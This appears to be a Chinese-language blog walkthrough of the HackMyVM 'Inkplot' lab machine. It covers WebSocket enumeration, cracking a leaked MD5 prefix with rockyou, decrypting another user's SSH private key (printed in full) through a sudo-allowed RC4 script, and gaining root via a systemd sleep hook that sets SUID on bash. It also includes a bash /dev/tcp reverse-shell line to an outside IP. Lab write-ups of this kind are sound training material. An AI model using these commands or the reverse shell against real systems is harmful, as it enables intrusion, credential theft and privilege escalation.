1
┌──(root㉿kali)-[/home/kali]
2
└─# arp-scan -l | grep "08:00:27" | awk '{print $1}'
3
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
4
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
5
10.0.90.216
6
10.0.90.216

侦查

1
┌──(root㉿kali)-[/home/kali]
2
└─# nmap -sC -sT -sV -p- -O 10.0.90.216
3
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-08-18 22:17 EDT
4
Nmap scan report for 10.0.90.216
5
Host is up (0.00034s latency).
6
Not shown: 65533 closed tcp ports (conn-refused)
7
PORT     STATE SERVICE VERSION
8
22/tcp   open  ssh     OpenSSH 9.2p1 Debian 2 (protocol 2.0)
9
| ssh-hostkey:
10
|   256 dd:83:da:cb:45:d3:a8:ea:c6:be:19:03:45:76:43:8c (ECDSA)
11
|_  256 e5:5f:7f:25:aa:c0:18:04:c4:46:98:b3:5d:a5:2b:48 (ED25519)
12
3000/tcp open  ppp?
13
MAC Address: 08:00:27:F1:97:62 (Oracle VirtualBox virtual NIC)
14
Device type: general purpose
15
Running: Linux 4.X|5.X
16
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
17
OS details: Linux 4.15 - 5.8, Linux 5.0 - 5.5
18
Network Distance: 1 hop
19
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
20

21
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
22
Nmap done: 1 IP address (1 host up) scanned in 22.53 seconds

1
┌──(root㉿kali)-[/home/kali]
2
└─# curl -v http://10.0.90.216:3000/
3
*   Trying 10.0.90.216:3000...
4
* Connected to 10.0.90.216 (10.0.90.216) port 3000
5
* using HTTP/1.x
6
> GET / HTTP/1.1
7
> Host: 10.0.90.216:3000
8
> User-Agent: curl/8.14.1
9
> Accept: */*
10
>
11
* Request completely sent off
12
< HTTP/1.1 426 Upgrade Required
13
< Content-Length: 16
14
< Content-Type: text/plain
15
< Date: Tue, 19 Aug 2025 02:20:07 GMT
16
< Connection: keep-alive
17
< Keep-Alive: timeout=5
18
<
19
* Connection #0 to host 10.0.90.216 left intact
20
Upgrade Required

漏洞点

HTTP/1.1 426 Upgrade Required

HTTP 状态码 426 表示：客户端（你用的 curl）请求的资源只接受通过更高版本的协议访问，比如 WebSocket (Upgrade: websocket) 或 HTTP/2 (Upgrade: h2c)。

利用websocat进行连接

1
┌──(root㉿kali)-[/home/kali]
2
└─# websocat ws://10.0.90.216:3000/
3

4
Welcome to our InkPlot secret IRC server
5
Bob: Alice, ready to knock our naive Leila off her digital pedestal?
6
Alice: Bob, I've been dreaming about this for weeks. Leila has no idea what's about to hit her.
7
Bob: Exactly. We're gonna tear her defense system apart. She won't see it coming.
8
Alice: Poor Leila, always so confident. Let's do this.
9
Bob: Alice, I'll need that MD5 hash to finish the job. Got it?
10
Alice: Yeah, I've got it. Time to shake Leila's world.
11
Bob: Perfect. Release it.
12
Alice: Here it goes: d51540...
13
*Alice has disconnected*
14
Bob: What?! Damn it, Alice?! Not now!
15
Leila: clear
16

17
欢迎来到 InkPlot 秘密 IRC 服务器
18

19
Bob：Alice，准备好把我们天真的 Leila 从她的“数字高台”上拉下来了吗？
20
Alice：Bob，我已经梦想这件事好几周了。Leila 完全不知道她即将面临什么。
21
Bob：没错。我们要彻底拆掉她的防御系统。她根本不会预料到。
22
Alice：可怜的 Leila，总是那么自信。我们开始吧。
23
Bob：Alice，我需要那个 MD5 哈希来完成任务。拿到了吗？
24
Alice：嗯，我拿到了。是时候震撼 Leila 的世界了。
25
Bob：完美。放出它吧。
26
Alice：给你：d51540...
27
*Alice 已断开连接*
28
Bob：什么？！该死的 Alice？！偏偏现在！
29
Leila：clear

写个脚本

1
#!/bin/bash
2
flag="d51540"
3

4
while read -r word; do
5
    hash=$(echo "$word" | md5sum | cut -d " " -f 1)
6
    if [[ $hash == $flag* ]]; then
7
        echo "[+]I got it! PASS: $word, HASH: $hash"
8
    fi
9
done < $1

1
┌──(root㉿kali)-[/home/kali/Desktop]
2
└─# ./flag.sh wordlists/rockyou.txt
3
[+]I got it! PASS: palmira, HASH: d515407c6ec25b2a61656a234ddf22bd
4
[+]I got it! PASS: intelinside, HASH: d51540c4ecaa62b0509f453fee4cd66b

获得密码palmira和intelinside

尝试登录

1
┌──(root㉿kali)-[/home/kali/Desktop]
2
└─# ssh leila@10.0.90.216
3
Auto-standby now activated after 2 min of inactivity
4
leila@10.0.90.216's password:
5
Permission denied, please try again.
6
leila@10.0.90.216's password:
7
Linux inkplot 6.1.0-10-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.38-1 (2023-07-14) x86_64
8

9
The programs included with the Debian GNU/Linux system are free software;
10
the exact distribution terms for each program are described in the
11
individual files in /usr/share/doc/*/copyright.
12

13
[oh-my-zsh] Would you like to update? [Y/n] n
14

15
╭─leila@inkplot ~
16
╰─$ whoami
17
leila

提权

信息收集

1
 sudo -l
2
 sudo: unable to resolve host inkplot: Name or service not known
3
Matching Defaults entries for leila on inkplot:
4
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
5

6
User leila may run the following commands on inkplot:
7
    (pauline : pauline) NOPASSWD: /usr/bin/python3 /home/pauline/cipher.py

sudo -l 允许的命令

1
User leila may run the following commands on inkplot:
2
    (pauline : pauline) NOPASSWD: /usr/bin/python3 /home/pauline/cipher.py

(pauline : pauline) → 以 用户 pauline 和用户组 pauline 的身份运行
NOPASSWD → 不需要密码
/usr/bin/python3 /home/pauline/cipher.py → 只能执行这个 Python 脚本

⚡ 总结：

leila 不能随便用 sudo 变成 root
但可以用 sudo -u pauline /usr/bin/python3 /home/pauline/cipher.py 来执行 cipher.py，且 不需要输入密码

1
╭─leila@inkplot ~
2
╰─$ cat /home/pauline/cipher.py                                                                                                                        1 ↵
3
import os
4
import json
5
import argparse
6
from Crypto.Cipher import ARC4
7
import base64
8

9
with open('/home/pauline/keys.json', 'r') as f:
10
    keys = json.load(f)
11

12
crypt_key = keys['crypt_key'].encode()
13

14
def encrypt_file(filepath, key):
15
    with open(filepath, 'rb') as f:
16
        file_content = f.read()
17

18
    cipher = ARC4.new(key)
19
    encrypted_content = cipher.encrypt(file_content)
20

21
    encoded_content = base64.b64encode(encrypted_content)
22

23
    base_filename = os.path.basename(filepath)
24

25
    with open(base_filename + '.enc', 'wb') as f:
26
        f.write(encoded_content)
27

28
    return base_filename + '.enc'
29

30
def decrypt_file(filepath, key):
31
    with open(filepath, 'rb') as f:
32
        encrypted_content = f.read()
33

34
    decoded_content = base64.b64decode(encrypted_content)
35

36
    cipher = ARC4.new(key)
37
    decrypted_content = cipher.decrypt(decoded_content)
38

39
    return decrypted_content
40

41
parser = argparse.ArgumentParser(description='Encrypt or decrypt a file.')
42
parser.add_argument('filepath', help='The path to the file to encrypt or decrypt.')
43
parser.add_argument('-e', '--encrypt', action='store_true', help='Encrypt the file.')
44
parser.add_argument('-d', '--decrypt', action='store_true', help='Decrypt the file.')
45

46
args = parser.parse_args()
47

48
if args.encrypt:
49
    encrypted_filepath = encrypt_file(args.filepath, crypt_key)
50
    print("The encrypted and encoded content has been written to: ")
51
    print(encrypted_filepath)
52
elif args.decrypt:
53
    decrypt_key = input("Please enter the decryption key: ").encode()
54
    decrypted_content = decrypt_file(args.filepath, decrypt_key)
55
    print("The decrypted content is: ")
56
    print(decrypted_content)
57
else:
58
    print("Please provide an operation type. Use -e to encrypt or -d to decrypt.")

cipher.py

1️⃣ 导入模块

1
import os
2
import json
3
import argparse
4
from Crypto.Cipher import ARC4
5
import base64

os → 文件路径处理
json → 读取 keys.json
argparse → 命令行参数解析
Crypto.Cipher.ARC4 → RC4 对称加密算法
base64 → 对加密数据做 Base64 编码/解码

2️⃣ 读取密钥

1
with open('/home/pauline/keys.json', 'r') as f:
2
    keys = json.load(f)
3

4
crypt_key = keys['crypt_key'].encode()

打开 /home/pauline/keys.json，读取 JSON 格式密钥
crypt_key 是 RC4 的加密密钥，并转成 bytes 类型

3️⃣ 加密函数

1
def encrypt_file(filepath, key):
2
    with open(filepath, 'rb') as f:
3
        file_content = f.read()
4

5
    cipher = ARC4.new(key)
6
    encrypted_content = cipher.encrypt(file_content)
7

8
    encoded_content = base64.b64encode(encrypted_content)
9

10
    base_filename = os.path.basename(filepath)
11

12
    with open(base_filename + '.enc', 'wb') as f:
13
        f.write(encoded_content)
14

15
    return base_filename + '.enc'

打开要加密的文件，读取二进制内容
用 **RC4 + ****key** 加密
用 Base64 编码加密后的内容
保存成 <原文件名>.enc 文件
返回加密后的文件名

4️⃣ 解密函数

1
def decrypt_file(filepath, key):
2
    with open(filepath, 'rb') as f:
3
        encrypted_content = f.read()
4

5
    decoded_content = base64.b64decode(encrypted_content)
6

7
    cipher = ARC4.new(key)
8
    decrypted_content = cipher.decrypt(decoded_content)
9

10
    return decrypted_content

打开加密文件，读取 Base64 编码内容
解码 Base64 → 得到 RC4 加密内容
用提供的 key 做 RC4 解密
返回解密后的原始内容（bytes 类型）

5️⃣ 命令行参数解析

1
parser = argparse.ArgumentParser(description='Encrypt or decrypt a file.')
2
parser.add_argument('filepath', help='The path to the file to encrypt or decrypt.')
3
parser.add_argument('-e', '--encrypt', action='store_true', help='Encrypt the file.')
4
parser.add_argument('-d', '--decrypt', action='store_true', help='Decrypt the file.')
5

6
args = parser.parse_args()

脚本接受三个参数：
1. filepath → 文件路径
2. -e / --encrypt → 加密操作
3. -d / --decrypt → 解密操作

6️⃣ 根据参数执行

1
if args.encrypt:
2
    encrypted_filepath = encrypt_file(args.filepath, crypt_key)
3
    print("The encrypted and encoded content has been written to: ")
4
    print(encrypted_filepath)
5
elif args.decrypt:
6
    decrypt_key = input("Please enter the decryption key: ").encode()
7
    decrypted_content = decrypt_file(args.filepath, decrypt_key)
8
    print("The decrypted content is: ")
9
    print(decrypted_content)
10
else:
11
    print("Please provide an operation type. Use -e to encrypt or -d to decrypt.")

如果加密：
- 调用 encrypt_file()，用 crypt_key 加密
- 输出生成的 .enc 文件名
如果解密：
- 提示用户输入解密密钥
- 调用 decrypt_file() 解密
- 打印解密后的内容（注意是 bytes，需要解码成字符串看）
否则：
- 提示用户必须指定 -e 或 -d

⚡ 总结

这个脚本是 RC4 + Base64 加密/解密工具
加密固定用 keys.json 中的 crypt_key
解密可以手动输入密钥，也可以用同样的 key
文件操作都是在当前目录下生成 .enc 文件或读取解密文件

RC4 - 对称流密码

RC4 是 对称加密算法，意味着加密和解密使用 同一个密钥
RC4 是 流密码（stream cipher），它的核心是把明文逐字节和一个伪随机密钥流做 XOR 异或运算

公式简化：

1
密文 = 明文 ⊕ 密钥流
2
明文 = 密文 ⊕ 密钥流

2️⃣ 异或运算的特点

XOR 运算有个规律：

1
A ⊕ B ⊕ B = A

也就是说，如果你对同一段数据用同一个密钥流 XOR 两次，它会回到原来的值

解密id_rsa

1
╭─leila@inkplot /tmp
2
╰─$ sudo -u pauline /usr/bin/python3 /home/pauline/cipher.py
3
usage: cipher.py [-h] [-e] [-d] filepath
4
cipher.py: error: the following arguments are required: filepath
5
╭─leila@inkplot /tmp
6
╰─$ sudo -u pauline /usr/bin/python3 /home/pauline/cipher.py -e /home/pauline/.ssh/id_rsa
7
The encrypted and encoded content has been written to:
8
id_rsa.enc
9
╭─leila@inkplot /tmp
10
╰─$ cat id_rsa.enc | base64 -d > new_id_rsa.enc
11
╭─leila@inkplot /tmp
12
╰─$ sudo -u pauline /usr/bin/python3 /home/pauline/cipher.py -e new_id_rsa.enc
13
The encrypted and encoded content has been written to:
14
new_id_rsa.enc.enc
15
╭─leila@inkplot /tmp
16
╰─$ cat new_id_rsa.enc.enc
17
LS0tLS1CRUdJTiBPUEVOU1NIIFBSSVZBVEUgS0VZLS0tLS0KYjNCbGJuTnphQzFyWlhrdGRqRUFBQUFBQkc1dmJtVUFBQUFFYm05dVpRQUFBQUFBQUFBQkFBQUJsd0FBQUFkemMyZ3RjbgpOaEFBQUFBd0VBQVFBQUFZRUFyc3RKYXVLWThpRG9aMXN6aFdCT01PY2VyMW5zMTRPZ2FiVjR5R3VXYkxTWGova3pqQ1JFClVjTXU2MXNVWUxkM05GSzRKQWRTY1RzWkZhVmIybGw3Z3J3clNXWEVWUUwzdDRLNlRuWnpKczZiN2JrTXBKMkRqUHZBYTcKS2ltUm9SZzAybWFIS1BNWkNreEUwY0U2T29sZG1oblFZcjFPdTIyTXpFQlR6cGphbXdjUGIrd3dnTFBGdm1EeHd4NnpVdApKcWxCQW93SHVrK25zSHdDVnV3eTR1Y1VIdnh3c1F5NkQrbjVoQlc2Z1NTRXBOVWFreHJ0ZTI0a0RZN2M1TlRrY3NGakdHCk9ZbWhLL1VnVXRtUVZuMCsxUURjUkNEMk53NTZKN1lkNGQxS1ArMUJQVldSNzJhbXpGUjRWT24xVHIyWHc2d1FMRklUYW4KaFVqc2hzYXoxbnUwV1BVOXJvaXBTTnhXUVltQTdtWkUwQU9vWlBZbTFSVVMrQWRzaXNRNmQ5QkJRUmxGb29DekJXYXJCQQptNWpTdjJEWDhxMHRaTjVFeStTYkNDaUVUVnQ2ZXQ0TFdndEZwOVVQQWdhM2RUU1IwdkwyYlZxOVhOaGpOemhZK25DclBTCkhzV3doSFRnZCtiMm54WmRyTkJ1VG1zdU9tNCtKSkJLN2Fsb0QrMTVBQUFGaU4waWpDemRJb3dzQUFBQUIzTnphQzF5YzIKRUFBQUdCQUs3TFNXcmltUElnNkdkYk00VmdUakRuSHE5WjdOZURvR20xZU1ocmxteTBsNC81TTR3a1JGSERMdXRiRkdDMwpkelJTdUNRSFVuRTdHUldsVzlwWmU0SzhLMGxseEZVQzk3ZUN1azUyY3liT20rMjVES1NkZzR6N3dHdXlvcGthRVlOTnBtCmh5anpHUXBNUk5IQk9qcUpYWm9aMEdLOVRydHRqTXhBVTg2WTJwc0hEMi9zTUlDenhiNWc4Y01lczFMU2FwUVFLTUI3cFAKcDdCOEFsYnNNdUxuRkI3OGNMRU11Zy9wK1lRVnVvRWtoS1RWR3BNYTdYdHVKQTJPM09UVTVITEJZeGhqbUpvU3YxSUZMWgprRlo5UHRVQTNFUWc5amNPZWllMkhlSGRTai90UVQxVmtlOW1wc3hVZUZUcDlVNjlsOE9zRUN4U0UycDRWSTdJYkdzOVo3CnRGajFQYTZJcVVqY1ZrR0pnTzVtUk5BRHFHVDJKdFVWRXZnSGJJckVPbmZRUVVFWlJhS0Fzd1ZtcXdRSnVZMHI5ZzEvS3QKTFdUZVJNdmttd2dvaEUxYmVucmVDMW9MUmFmVkR3SUd0M1Uwa2RMeTltMWF2VnpZWXpjNFdQcHdxejBoN0ZzSVIwNEhmbQo5cDhXWGF6UWJrNXJManB1UGlTUVN1MnBhQS90ZVFBQUFBTUJBQUVBQUFHQVN4MXlOZndkMVFPZVMvaE42alhLTkVyR0RYCjM4QVZ0LzNwMk5RN2UwWTQreUNEMkQwT2d1OGVJS2Nqcm9SVzNpVExwMWhvb2MvQ3IwNnkvdUNxWGtwWGgrczZLSG5pN1IKekd0aDYrRU1PRE9XbjdDanhjUW82YmV3WjdmVEZ5ODBNblIybkRFSzV6WnRFQ3pBOFpHbG00djBYem50TVNtQW9LZFNYNQp2ZkZERkZjUzQ3cWcxMVlxRnRlclhYbitmd3VNb0lkWE0reU9wOU9pTDRrR2tkcnhPMXVtRXFmbk5sSy95VTdSVzNXZE1iCks0aW16R3ZJZllBRi8wdVRFc1dIbFdqL1hoOVpJSXdzMTk2S2VqNDVOd0M2TGo2UmhBRDNSbkpCNmVJRWVrenFIWEQ1anYKMjAwWE9KOTZ0dmUvbHdLbEUyZWdWR2xEZlhGRHkvUVU1WXpCR204VWd3NWFvWS93V0R1RG1OYjRtVDR4NUdHQ1ZocVRLWQpnOUppQlpGUHJkSFhGclp4bUpScEpLa1Azd2xMaVNYc0JQR2FMWjNxRFlVay9PeVRzNUhNREpoNTAzMFJ6Qlp5WG9kTXJ0Cjc5UXNqUEtxc1ZSL2d6YWd6Q2w3bWFTdFUzMDdrTGVFQnlDZDRmMlI0OWIwVXA3RFF2azdsdS8wMGJIdmFBVUcrL0FBQUEKd1FDcXFobDRqZ0MrMGJ2K2dIY0Z0VHZTcjFJVGdHYzVwc0ZId1diTnR3UUFHanhieUs0R3FlVTM1ckY2b2hOSXQ3dXNBQgpBQ2tiMmhSWTJVK1BQRTNNMkdzTXBQYnJXeWYwSlRnd0M4M0h3NWhFN2liUDRRWUsyeUFuNDA5elVudzZLQU4wdHVTVGJ5ClF0cmFWdXEwVEplWVUzbm9WSlVmRm1zMHgxUUFIQmN4TTlaOWsrMSt1alhsY1ppazlDM3FoRUFVZFR4aWtMeGpUT2FFaFcKVzZ5NDFrVjc4RzU0NmNnVWNqUk9CdTIxellzWTBHOHRQam9idFN6dVcrSGtva3ltb0FBQURCQVBKVUsrQ291VnlkRW1vMgpuOVJOWWI5eFg0SjBQUWdreTYwRVF4NXhxZUFMV2hIcUpYZXRtemd5QW0ycmx1R0ErNHUwZWN5eVZBN1hLMVN5TmRFTkhrClRiM05OQ3padmpmSEhyZkRtM3c3OTlQVlAzZEFocEkzSmIxa0ZkM0h5TURhRklGM3AxS3gvR2I4VXlPcWxpTGg5d09XTWEKcnV2UzRGdk9sZlc3WTl1WWtpTThaSHR4VWNZRWVqN3FUYkpmNFBNdERxRDhQODZqTE8xeVV5NTdKVTEwbnIyVTNoYllGRgpHeGdwMmNVR2cra0tsWHE5SktybGJ6YURuWkpFdzZvd0FBQU1FQXVLZS9MbmhXVGJJZ3cyOW1HUm9iZmxTaVBaUTltUTcrCmlFV1FXdzdGT1dwOGlHN09RM2J1Rk1DdnBzYWZqZTgrUEw0YlYwdUttSTZhbEsySW5xR2xON2p0K0ZZTENEdWdzbVV3aUEKQTZLcmxzRlh0UHYvQk9vNkxLNVllNk9UWUlRbklSRjVna3BVSjFGdVBTUTRkUHh3bEk3NDBPSEFpQjdCSE5nSlFoZCtFbApzWXdNQnJodXBORE5PakdJc2IydDV5Ly9PRUd3NGdpZjRGYmhEOUdxT2NnRG1Zb1hTUHhxTFVCOGRpdXBQVUdVSFVCT1NwCmFEZkFEOHloaVVtYlV6QUFBQURuQmhkV3hwYm1WQVpHVmlhV0Z1QVFJREJBPT0KLS0tLS1FTkQgT1BFTlNTSCBQUklWQVRFIEtFWS0tLS0tCg==%
18
╭─leila@inkplot /tmp
19
╰─$ cat new_id_rsa.enc.enc | base64 -d
20
-----BEGIN OPENSSH PRIVATE KEY-----
21
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
57
-----END OPENSSH PRIVATE KEY-----

1
┌──(root㉿kali)-[/home/kali/Desktop]
2
└─# chmod 777 id_rsa
3

4
┌──(root㉿kali)-[/home/kali/Desktop]
5
└─# ssh pauline@10.0.90.216 -i id_rsa
6
Auto-standby now activated after 2 min of inactivity
7
Linux inkplot 6.1.0-10-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.38-1 (2023-07-14) x86_64
8

9
The programs included with the Debian GNU/Linux system are free software;
10
the exact distribution terms for each program are described in the
11
individual files in /usr/share/doc/*/copyright.
12

13
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
14
permitted by applicable law.
15
[oh-my-zsh] Would you like to update? [Y/n] n
16
[oh-my-zsh] You can update manually by running `omz update`
17

18
╭─pauline@inkplot ~
19
╰─$

1
╭─pauline@inkplot ~
2
╰─$ id
3
uid=1000(pauline) gid=1000(pauline) groups=1000(pauline),100(users),1002(admin)
4
╭─pauline@inkplot ~
5
╰─$
6
Broadcast message from root@inkplot (Tue 2025-08-19 05:45:10 CEST):
7

8
The system will suspend now!

在思考的时候发现机器被挂起了

重启一下

1
2️⃣ 所属组
2

3
groups=1000(pauline),100(users),1002(admin)
4

5
你属于三个组：
6

7
pauline（主组）
8

9
users（普通用户组）
10

11
admin（管理员组，可能有 sudo 权限）

1
╭─pauline@inkplot ~
2
╰─$ find / -group admin 2>/dev/null
3
/usr/lib/systemd/system-sleep

1
/usr/lib/systemd/system-sleep 是一个在 Linux 系统中由 systemd 管理的特殊目录，用于存放在系统进入睡眠状态（如挂起到内存或磁盘）或唤醒时自动执行的脚本。
2

3
当系统准备进入睡眠状态时，systemd 会运行此目录下所有以 .needs 或 .wants 结尾的脚本，并传递一个参数，指示系统即将进入哪种睡眠状态（例如 suspend、hibernate 或 hybrid-sleep）。同样，当系统从睡眠状态唤醒时，也会运行相应的脚本。
4

5
这些脚本通常用于执行一些在系统睡眠或唤醒时需要进行的特殊操作，例如：
6

7
保存或恢复某些硬件状态。
8
停止或重启某些服务。
9
更新或清理缓存。
10
执行一些自定义的操作。

提权root

1
╭─pauline@inkplot ~
2
╰─$ cd /usr/lib/systemd/system-sleep                                                                                                            1 ↵
3
╭─pauline@inkplot /usr/lib/systemd/system-sleep
4
╰─$ echo '#!/bin/bash' > payload
5
╭─pauline@inkplot /usr/lib/systemd/system-sleep
6
╰─$ echo 'chmod +s /bin/bash' >> payload
7
╭─pauline@inkplot /usr/lib/systemd/system-sleep
8
╰─$ cat payload
9
#!/bin/bash
10
chmod +s /bin/bash
11
╭─pauline@inkplot /usr/lib/systemd/system-sleep
12
╰─$ chmod +x payload
13
╭─pauline@inkplot /usr/lib/systemd/system-sleep
14
╰─$ ls -la
15
total 20
16
drwxrwx---  2 root    admin    4096 Apr 22 08:52 .
17
drwxr-xr-x 14 root    root    12288 Jul 28  2023 ..
18
-rwxr-xr-x  1 pauline pauline    31 Apr 22 08:52 payload
19

20
普通用户在执行 /bin/bash 时会获得 root 权限。

1
─pauline@inkplot ~
2
╰─$ echo '#!/bin/bash' > /tmp/root.sh && echo 'bash -i >& /dev/tcp/192.168.2.199/4444 0>&1' >> /tmp/root.sh && chmod +x /tmp/root.sh

静等挂起

1
bash -p

-p 表示 privileged mode（特权模式）

作用：

当 Bash 是 SUID 或 SGID 的程序时，-p 保留原来的有效 UID/GID，而不是降低为实际用户 UID/GID

这样可以让普通用户在拥有 SUID 的 Bash 下执行命令时以 root 权限运行（如果 /bin/bash 的 SUID 被设置）

1
╭─pauline@inkplot ~
2
╰─$ bash -p
3
bash-5.2# whoami
4
root
5
bash-5.2# cd /root
6
bash-5.2# ls -la
7
total 52
8
drwx------  6 root root 4096 Aug  3  2023 .
9
drwxr-xr-x 18 root root 4096 Jul 27  2023 ..
10
lrwxrwxrwx  1 root root    9 Jun 15  2023 .bash_history -> /dev/null
11
-rw-r--r--  1 root root  571 Jul 22  2023 .bashrc
12
-rw-------  1 root root   20 Aug  1  2023 .lesshst
13
drwxr-xr-x  3 root root 4096 Aug  1  2023 .local
14
drwxr-xr-x  4 root root 4096 Jul 26  2023 .npm
15
drwxr-xr-x 12 root root 4096 Jul 22  2023 .oh-my-zsh
16
-rw-r--r--  1 root root  161 Jul 22  2023 .profile
17
-rwx------  1 root root   33 Aug  1  2023 root.txt
18
-rw-r--r--  1 root root   66 Jul 22  2023 .selected_editor
19
drwx------  2 root root 4096 Jul 25  2023 .ssh
20
-rw-r--r--  1 root root  165 Jul 26  2023 .wget-hsts
21
lrwxrwxrwx  1 root root    9 Jul 22  2023 .zsh_history -> /dev/null
22
-rw-r--r--  1 root root 3890 Jul 22  2023 .zshrc
23
bash-5.2# cat root.txt
24
4d9089c262be4a03e3ebfdaff0a8f7c6

1
bash-5.2# cat suspend.sh
2
#!/bin/bash
3

4
while true ; do
5
  TIME=$(w -o |grep "pauline" | awk '{print $5}')
6
  if [[ $TIME != "-zsh" ]] ; then
7
    TIME=${TIME%%:*}
8
    if [[ $TIME -gt 1 ]] ; then
9
      systemctl suspend
10
    fi
11
  fi
12
  sleep 5
13
done
14

15
不断检查用户 pauline 的空闲时间（idle time）。
16
如果用户空闲时间超过 1 小时，就执行 systemctl suspend，让系统进入挂起（睡眠）状态。
17
脚本每 5 秒检查一次。

Thanks for reading!

HMV-Inkplot

Tue Aug 19 2025

673 words · 3 minutes

Documentation Hackmyvm Hackmyvm Linux Machine Privilege Escalation Enumeration